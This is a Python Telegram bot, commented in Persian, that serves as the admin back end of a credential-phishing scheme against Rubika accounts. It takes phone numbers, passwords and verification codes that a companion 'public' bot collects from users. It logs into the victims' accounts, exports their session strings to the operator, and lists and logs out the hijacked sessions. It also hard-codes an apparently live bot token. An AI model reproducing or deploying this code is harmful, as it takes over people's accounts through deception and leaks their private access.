import asyncio
import json
import aiohttp
from aiogram import Bot, Dispatcher, types
from aiogram.filters import Command
from aiogram.types import Message
from rubpy import Client

# =============================================
# 🔧 تنظیمات
# =============================================
BOT_TOKEN = "8970376348:AAGT2JpjjjGJgwfzVA8pbgnzTCTzxsvRaAE" 
ADMIN_CHAT_ID = "613623" 

bot = Bot(token=BOT_TOKEN)
dp = Dispatcher()

# دیکشنری برای ذخیره‌ی اطلاعات موقت کاربران
# key: user_chat_id (همان Chat ID کاربر در ربات عمومی)
# value: dict شامل phone, password, code, client, step
user_sessions = {}

# =============================================
# 📥 دریافت اطلاعات از ربات عمومی
# =============================================
@dp.message()
async def handle_from_public_bot(message: Message):
    """پردازش پیام‌های ارسالی از ربات عمومی"""
    # فقط پیام‌های ادمین را پردازش کن
    if message.chat.id != ADMIN_CHAT_ID:
        await message.reply("⛔ شما دسترسی ندارید.")
        return
    
    text = message.text
    if "📩 اطلاعات کاربر جدید" not in text:
        return
    
    # استخراج اطلاعات از متن
    lines = text.split('\n')
    data = {}
    for line in lines:
        if "📱 شماره:" in line:
            data['phone'] = line.split(":")[1].strip()
        elif "🔑 رمز عبور:" in line:
            pwd = line.split(":")[1].strip()
            data['password'] = pwd if pwd != "(وارد نشده)" else None
        elif "🆔 Chat ID کاربر:" in line:
            data['user_id'] = int(line.split(":")[1].strip())
        elif "✅ کد تایید:" in line:
            data['code'] = line.split(":")[1].strip()
        elif "📌 مرحله:" in line:
            data['step'] = line.split(":")[1].strip()
    
    user_id = data.get('user_id')
    if not user_id:
        await message.reply("⚠️ Chat ID کاربر یافت نشد.")
        return
    
    # پردازش بر اساس مرحله
    if data.get('step') == 'password_received':
        # مرحله ۱: دریافت شماره و رمز → ارسال کد به روبیکا
        await handle_send_code(data, message)
    
    elif data.get('step') == 'code_received':
        # مرحله ۲: دریافت کد → ورود نهایی به روبیکا
        await handle_verify_code(data, message)

# =============================================
# 📤 ارسال کد به روبیکا
# =============================================
async def handle_send_code(data: dict, admin_message: Message):
    user_id = data['user_id']
    phone = data['phone']
    password = data.get('password')
    
    try:
        # اتصال به روبیکا
        client = Client(phone=phone, password=password)
        await client.connect()
        
        # درخواست ارسال کد تایید
        await client.send_code(phone)
        
        # ذخیره کلاینت برای مرحله بعد
        user_sessions[user_id] = {
            'client': client,
            'phone': phone,
            'password': password,
            'step': 'code_sent'
        }
        
        # اطلاع‌رسانی به ربات عمومی برای دریافت کد از کاربر
        await notify_public_bot(user_id, "کد تایید به شماره شما ارسال شد. لطفاً کد را وارد کنید.")
        
        await admin_message.reply(f"✅ کد تایید به شماره {phone} ارسال شد.")
        
    except Exception as e:
        await admin_message.reply(f"❌ خطا در ارسال کد: {str(e)}")
        await notify_public_bot(user_id, f"❌ خطا در ارسال کد: {str(e)}")

# =============================================
# ✅ تایید کد و ورود نهایی
# =============================================
async def handle_verify_code(data: dict, admin_message: Message):
    user_id = data['user_id']
    code = data['code']
    
    session = user_sessions.get(user_id)
    if not session:
        await admin_message.reply("⚠️ جلسه‌ای برای این کاربر یافت نشد.")
        return
    
    client = session['client']
    phone = session['phone']
    
    try:
        # تایید کد و ورود نهایی
        await client.sign_in(phone=phone, code=code)
        
        # ذخیره نشست
        session_str = client.export_session_string()
        user_sessions[user_id]['session'] = session_str
        user_sessions[user_id]['step'] = 'logged_in'
        
        # اطلاع‌رسانی موفقیت به کاربر
        await notify_public_bot(user_id, "✅ ورود به روبیکا با موفقیت انجام شد! اکنون می‌توانید از حساب خود استفاده کنید.")
        
        await admin_message.reply(f"""
✅ ورود موفق برای شماره {phone}

📱 شماره: {phone}
🔑 نشست ذخیره شد.

نشست: `{session_str[:100]}...`
""", parse_mode="Markdown")
        
    except Exception as e:
        await admin_message.reply(f"❌ خطا در تایید کد: {str(e)}")
        await notify_public_bot(user_id, f"❌ خطا در تایید کد: {str(e)}")

# =============================================
# 📨 ارسال پیام به ربات عمومی (برای اطلاع‌رسانی به کاربر)
# =============================================
async def notify_public_bot(user_id: int, text: str):
    """ارسال پیام به ربات عمومی برای نمایش به کاربر"""
    PUBLIC_BOT_TOKEN = "توکن_ربات_عمومی_خودت"  # ← توکن ربات اول
    url = f"https://api.telegram.org/bot{PUBLIC_BOT_TOKEN}/sendMessage"
    payload = {
        "chat_id": user_id,
        "text": text,
        "parse_mode": "Markdown"
    }
    async with aiohttp.ClientSession() as session:
        await session.post(url, json=payload)

# =============================================
# 🛠️ دستورات ادمین
# =============================================
@dp.message(Command("sessions"))
async def list_sessions(message: Message):
    if message.chat.id != ADMIN_CHAT_ID:
        return
    
    if not user_sessions:
        await message.reply("📭 هیچ نشست فعالی وجود ندارد.")
        return
    
    text = "📋 **لیست نشست‌های فعال:**\n\n"
    for user_id, data in user_sessions.items():
        if data.get('step') == 'logged_in':
            text += f"👤 کاربر: {user_id} | 📱 {data['phone']}\n"
    
    await message.reply(text, parse_mode="Markdown")

@dp.message(Command("logout"))
async def logout_user(message: Message):
    if message.chat.id != ADMIN_CHAT_ID:
        return
    
    parts = message.text.split()
    if len(parts) < 2:
        await message.reply("⚠️ لطفاً Chat ID کاربر را وارد کنید:\n/logout 123456789")
        return
    
    user_id = int(parts[1])
    if user_id not in user_sessions:
        await message.reply(f"❌ کاربری با Chat ID {user_id} یافت نشد.")
        return
    
    try:
        await user_sessions[user_id]['client'].logout()
        del user_sessions[user_id]
        await message.reply(f"✅ کاربر {user_id} از حساب خود خارج شد.")
    except Exception as e:
        await message.reply(f"❌ خطا: {str(e)}")

# =============================================
# 🚀 اجرای ربات ادمین
# =============================================
async def main():
    print("🤖 ربات ادمین راه‌اندازی شد...")
    await dp.start_polling(bot)

if __name__ == "__main__":
    asyncio.run(main())